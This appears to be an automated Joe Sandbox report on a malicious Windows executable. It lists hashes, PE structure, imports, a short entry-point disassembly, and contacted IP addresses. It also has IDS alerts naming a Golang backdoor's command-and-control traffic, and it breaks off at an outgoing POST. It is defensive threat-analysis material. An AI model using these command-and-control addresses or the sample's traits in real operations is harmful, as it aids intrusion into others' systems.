      http://46.8.236.61 | m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp | false | | high
      http://www.remobjects.com/ps | m0Yc9KltGw.exe | false | | high
      http://91.212.166.91 | m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmp | false | | high

      IP | Domain | Country | ASN | ASN Name | Malicious
      46.8.232.106 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false
      188.130.206.243 | unknown | Russian Federation | 200509 | SVINT-ASNES | false
      185.121.233.152 | unknown | Spain | 198432 | IPCORE-ASES | true
      93.185.159.253 | unknown | Russian Federation | 39912 | I3B-ASAT | false
      91.212.166.91 | unknown | United Kingdom | 35819 | MOBILY-ASEtihadEtisalatCompanyMobilySA | false
      46.8.236.61 | unknown | Russian Federation | 28917 | FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics | false

      Joe Sandbox version: 41.0.0 Charoite
      Analysis ID: 1550358
      Start date and time: 2024-11-06 17:17:40 +01:00
      Joe Sandbox product: CloudBasic
      Overall analysis duration: 0h 6m 6s
      Hypervisor based Inspection enabled: false
      Report type: full
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed: 6
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Sample name: m0Yc9KltGw.exe (renamed because original name is a hash value)
      Original Sample Name: 63b7bb26a60fb9e73c0e1427a4fcfaf2.exe
      Detection: MAL
      Classification: mal76.troj.evad.winEXE@1/1@0/6
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 78%
      • Number of executed functions: 230
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes were analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • VT rate limit hit for: m0Yc9KltGw.exe
      No simulations
                          No context
                          Process:C:\Users\user\Desktop\m0Yc9KltGw.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):416
                          Entropy (8bit):6.320559438243785
                          Encrypted:false
                          SSDEEP:6:hDvj1TuSmxUOrW5i9w61bcwggpMUy+9oCHSFjQ0PJb06l0enbImrgjSZ438bij7E:Z1SSnOR9RCrE0EybBaez8jSEjCD
                          MD5:39E17AC372042E4E923706D74C389C7F
                          SHA1:17769ED014E9E8E770F500705E44C802C098A4E4
                          SHA-256:77C3B2ECA7ECB574811E9678B2D7132A7501F6318FCD5817332689159ED16F22
                          SHA-512:C981160522269CB697F315802BC0AD17509C528AF46D34C9A32606FC8CF4230B975148B7778261C1E65C3031FFE53D180B62707146AFFCBD1EBF2F5F26FD452A
                          Malicious:false
                          Reputation:low
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.344609272629543
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.81%
                          • Windows ActiveX control (116523/4) 1.15%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:m0Yc9KltGw.exe
                          File size:9'312'768 bytes
                          MD5:63b7bb26a60fb9e73c0e1427a4fcfaf2
                          SHA1:83b9ac53d958a36dd340f93d08615f452584cf17
                          SHA256:e78fc7300dea3f82b9fb7130621e27f5459d4a521243fd42033f6f010f2995e2
                          SHA512:692123501d5bcbf2374c2cd3d95bd4d479486f9cee89e41334629485e6f8d5cad9eb6eb8b4602fefe3b72835f9630839c1896459a0c0dde5c05d45e7028bbc82
                          SSDEEP:196608:9Kh403NRb/3CZPrcgGkgMgMf06UujdDuBa6QZFzABsPFMw:9Kh4INxuLPfdjwy0qF1
                          TLSH:B1967BAB05C26DDDEEE47BF19719E9B64290CC2EF83CC179EA5377AB812068344DC590
                          File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                          Icon Hash:8000601cc3780c93
                          Entrypoint:0x5025d8
                          Entrypoint Section:.itext
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:f62b90e31eca404f228fcf7068b00f31
                          Signature Valid:
                          Signature Issuer:
                          Signature Validation Error:
                          Error Number:
                          Not Before, Not After
                            Subject Chain
                              Version:
                              Thumbprint MD5:
                              Thumbprint SHA-1:
                              Thumbprint SHA-256:
                              Serial:
                              Instruction
                              push ebp
                              mov ebp, esp
                              add esp, FFFFFFF0h
                              push ebx
                              push esi
                              push edi
                              mov eax, 00500930h
                              call 00007FD6B8FAA220h
                              push FFFFFFECh
                              mov eax, dword ptr [00505E5Ch]
                              mov eax, dword ptr [eax]
                              mov ebx, dword ptr [eax+00000170h]
                              push ebx
                              call 00007FD6B8FB1A31h
                              and eax, FFFFFF7Fh
                              push eax
                              push FFFFFFECh
                              mov eax, dword ptr [00505E5Ch]
                              push ebx
                              call 00007FD6B8FB1C86h
                              xor eax, eax
                              push ebp
                              push 00502653h
                              push dword ptr fs:[eax]
                              mov dword ptr fs:[eax], esp
                              push 00000001h
                              call 00007FD6B8FB13D1h
                              call 00007FD6B90A826Ch
                              mov eax, dword ptr [00500568h]
                              push eax
                              push 005005CCh
                              mov eax, dword ptr [00505E5Ch]
                              mov eax, dword ptr [eax]
                              call 00007FD6B902405Dh
                              call 00007FD6B90A82C0h
                              xor eax, eax
                              pop edx
                              pop ecx
                              pop ecx
                              mov dword ptr fs:[eax], edx
                              jmp 00007FD6B90AA23Bh
                              jmp 00007FD6B8FAC2ADh
                              call 00007FD6B90A803Ch
                              mov eax, 00000001h
                              call 00007FD6B8FACD6Eh
                              call 00007FD6B8FAC6F1h
                              mov eax, dword ptr [00505E5Ch]
                              mov eax, dword ptr [eax]
                              mov edx, 005027E8h
                              call 00007FD6B9023B68h
                              push 00000005h
                              mov eax, dword ptr [00505E5Ch]
                              mov eax, dword ptr [eax]
                              mov eax, dword ptr [eax+00000170h]
                              push eax
                              call 00007FD6B8FB1C47h
                              mov eax, dword ptr [00505E5Ch]
                              mov eax, dword ptr [eax]
                              mov edx, dword ptr [004DACA0h]
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10e000 | 0x3840 | .idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x114000 | 0x7d90fc | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x169400 | 0x1a60 | .rsrc
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x10ea80 | 0x88c | .idata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              .text | 0x1000 | 0xffdc8 | 0xffe00 | de5f49260bb90d8d1e2e922872ccd636 | False | 0.4830248916096727 | data | 6.590737520337448 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .itext | 0x101000 | 0x17f4 | 0x1800 | eb5323291d86155b4efcb8378c9c4adc | False | 0.5242513020833334 | data | 6.004648972685504 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .data | 0x103000 | 0x308c | 0x3200 | c2acc8e96fc244753abd1d87bb624bc0 | False | 0.425078125 | data | 4.3575606000501415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .bss | 0x107000 | 0x6198 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata | 0x10e000 | 0x3840 | 0x3a00 | 0e1e8128f777a5ff18a144305a4fb39c | False | 0.3108836206896552 | data | 5.2048781278956655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .tls | 0x112000 | 0x3c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rdata | 0x113000 | 0x18 | 0x200 | 9cf98ea6bb17a35d99fa770a2e9a8ff0 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q" | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc | 0x114000 | 0x7d90fc | 0x7d9200 | 353cbee8ae0e2a3c9acdb07ce0da5a3e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                              RT_CURSOR | 0x114e80 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
                              RT_CURSOR | 0x114fb4 | 0x134 | data | English | United States | 0.4642857142857143
                              RT_CURSOR | 0x1150e8 | 0x134 | data | English | United States | 0.4805194805194805
                              RT_CURSOR | 0x11521c | 0x134 | data | English | United States | 0.38311688311688313
                              RT_CURSOR | 0x115350 | 0x134 | data | English | United States | 0.36038961038961037
                              RT_CURSOR | 0x115484 | 0x134 | data | English | United States | 0.4090909090909091
                              RT_CURSOR | 0x1155b8 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
                              RT_BITMAP | 0x1156ec | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 | | | 0.2945859872611465
                              RT_BITMAP | 0x115bd4 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.521551724137931
                              RT_ICON | 0x115cbc | 0xbb3d | PC bitmap, Windows 3.x format, 6211 x 2 x 51, image size 48174, cbSize 47933, bits offset 54 | | | 0.4672146537875785
                              RT_ICON | 0x1217fc | 0x6442 | PC bitmap, Windows 3.x format, 3403 x 2 x 39, image size 26415, cbSize 25666, bits offset 54 | | | 0.5660017143302424
                              RT_ICON | 0x127c40 | 0x392f | PC bitmap, Windows 3.x format, 2117 x 2 x 51, image size 14801, cbSize 14639, bits offset 54 | | | 0.5403374547441765
                              RT_ICON | 0x12b570 | 0x16c45 | PC bitmap, Windows 3.x format, 12059 x 2 x 54, image size 93532, cbSize 93253, bits offset 54 | | | 0.5215060105304923
                              RT_ICON | 0x1421b8 | 0x74c036 | PC bitmap, Windows 3.x format, 956907 x 2 x 42, image size 7651831, cbSize 7651382, bits offset 54 | | | 0.6329851150512695
                              RT_ICON | 0x88e1f0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.16124733475479744
                              RT_ICON | 0x88f098 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.18005415162454874
                              RT_ICON | 0x88f940 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.17799539170506912
                              RT_ICON | 0x890008 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.16473988439306358
                              RT_ICON | 0x890570 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.013026304109832234
                              RT_ICON | 0x8d2598 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.07717842323651453
                              RT_ICON | 0x8d4b40 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.0947467166979362
                              RT_ICON | 0x8d5be8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.1540983606557377
                              RT_ICON | 0x8d6570 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.19858156028368795
                              RT_STRING | 0x8d69d8 | 0xec | data | | | 0.6059322033898306
                              RT_STRING | 0x8d6ac4 | 0x250 | data | | | 0.47466216216216217
                              RT_STRING | 0x8d6d14 | 0x28c | data | | | 0.4647239263803681
                              RT_STRING | 0x8d6fa0 | 0x3e4 | data | | | 0.4347389558232932
                              RT_STRING | 0x8d7384 | 0x9c | data | | | 0.717948717948718
                              RT_STRING | 0x8d7420 | 0xe8 | data | | | 0.6293103448275862
                              RT_STRING | 0x8d7508 | 0x468 | data | | | 0.3820921985815603
                              RT_STRING | 0x8d7970 | 0x38c | data | | | 0.3898678414096916
                              RT_STRING | 0x8d7cfc | 0x3dc | data | | | 0.39271255060728744
                              RT_STRING | 0x8d80d8 | 0x360 | data | | | 0.37037037037037035
                              RT_STRING | 0x8d8438 | 0x40c | data | | | 0.3783783783783784
                              RT_STRING | 0x8d8844 | 0x108 | data | | | 0.5113636363636364
                              RT_STRING | 0x8d894c | 0xcc | data | | | 0.6029411764705882
                              RT_STRING | 0x8d8a18 | 0x234 | data | | | 0.5070921985815603
                              RT_STRING | 0x8d8c4c | 0x3c8 | data | | | 0.3181818181818182
                              RT_STRING | 0x8d9014 | 0x32c | data | | | 0.43349753694581283
                              RT_STRING | 0x8d9340 | 0x2a0 | data | | | 0.41964285714285715
                              RT_RCDATA | 0x8d95e0 | 0x82e8 | data | English | United States | 0.11261637622344235
                              RT_RCDATA | 0x8e18c8 | 0x10 | data | | | 1.5
                              RT_RCDATA | 0x8e18d8 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333
                              RT_RCDATA | 0x8e30d8 | 0x6bc | data | | | 0.6467517401392111
                              RT_RCDATA | 0x8e3794 | 0x5b10 | PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows | English | United States | 0.3255404941660947
                              RT_RCDATA | 0x8e92a4 | 0x125 | Delphi compiled form 'TMainForm' | | | 0.7508532423208191
                              RT_RCDATA | 0x8e93cc | 0x3a2 | Delphi compiled form 'TNewDiskForm' | | | 0.524731182795699
                              RT_RCDATA | 0x8e9770 | 0x320 | Delphi compiled form 'TSelectFolderForm' | | | 0.53625
                              RT_RCDATA | 0x8e9a90 | 0x300 | Delphi compiled form 'TSelectLanguageForm' | | | 0.5703125
                              RT_RCDATA | 0x8e9d90 | 0x5d9 | Delphi compiled form 'TUninstallProgressForm' | | | 0.4562458249832999
                              RT_RCDATA | 0x8ea36c | 0x461 | Delphi compiled form 'TUninstSharedFileForm' | | | 0.4335414808206958
                              RT_RCDATA | 0x8ea7d0 | 0x2092 | Delphi compiled form 'TWizardForm' | | | 0.2299112497001679
                              RT_GROUP_CURSOR | 0x8ec864 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
                              RT_GROUP_CURSOR | 0x8ec878 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
                              RT_GROUP_CURSOR | 0x8ec88c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                              RT_GROUP_CURSOR | 0x8ec8a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                              RT_GROUP_CURSOR | 0x8ec8b4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                              RT_GROUP_CURSOR | 0x8ec8c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                              RT_GROUP_CURSOR | 0x8ec8dc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
                              RT_GROUP_ICON | 0x8ec8f0 | 0x84 | data | English | United States | 0.6590909090909091
                              RT_VERSION | 0x8ec974 | 0x15c | data | English | United States | 0.5689655172413793
                              RT_MANIFEST | 0x8ecad0 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924
                              DLL | Import
                              oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
                              advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
                              user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                              kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                              kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                              user32.dll | CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                              msimg32.dll | AlphaBlend
                              gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                              version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                              mpr.dll | WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                              kernel32.dll | lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                              advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                              comctl32.dll | InitCommonControls
                              kernel32.dll | Sleep
                              oleaut32.dll | GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                              ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                              oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                              comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                              shell32.dll | ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                              shell32.dll | SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                              comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
                              ole32.dll | CoDisconnectObject
                              advapi32.dll | AdjustTokenPrivileges
                              oleaut32.dll | SysFreeString
                              Language of compilation system | Country where language is spoken | Map
                              English | United States |
                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                              2024-11-06T17:18:58.773033+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.8 | 49709 | TCP
                              2024-11-06T17:19:22.896584+0100 | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 185.121.233.152 | 25139 | 192.168.2.8 | 49718 | TCP
                              2024-11-06T17:19:22.896893+0100 | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 192.168.2.8 | 49718 | 185.121.233.152 | 25139 | TCP
                              2024-11-06T17:19:37.328755+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.8 | 49719 | TCP
                              2024-11-06T17:19:52.178566+0100 | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 192.168.2.8 | 49718 | 185.121.233.152 | 25139 | TCP
                              2024-11-06T17:19:52.412438+0100 | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 185.121.233.152 | 25139 | 192.168.2.8 | 49718 | TCP
                              • 46.8.232.106
                              • 46.8.236.61
                              • 93.185.159.253
                              • 91.212.166.91
                              • 188.130.206.243
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.8 | 49704 | 46.8.232.106 | 80 | 1984 | C:\Users\user\Desktop\m0Yc9KltGw.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Nov 6, 2024 17:18:43.033643961 CET | 334 | OUT | POST / HTTP/1.1
